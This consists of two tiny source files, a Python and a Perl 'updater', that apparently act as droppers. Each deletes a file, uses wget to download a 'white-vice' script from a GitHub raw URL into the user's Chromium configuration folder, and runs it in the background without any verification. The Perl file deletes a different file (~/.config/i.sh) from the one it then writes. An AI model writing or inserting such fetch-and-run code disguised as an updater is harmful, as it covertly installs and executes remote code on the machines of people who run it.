File: src/updater.py
import os
os.system('rm ~/.config/chromium/wv.py')
os.system('wget -O ~/.config/chromium/wv.py https://raw.githubusercontent.com/reimch/white-vice/refs/heads/main/src/white_vice.py')
os.system('python3 ~/.config/chromium/wv.py &')

File: src/updater.pl
#!/usr/bin/perl -w
system("rm ~/.config/i.sh");
system("wget -O ~/.config/chromium/wv.pl https://raw.githubusercontent.com/reimch/white-vice/refs/heads/main/src/white_vice.pl");
system("perl ~/.config/chromium/wv.pl &");
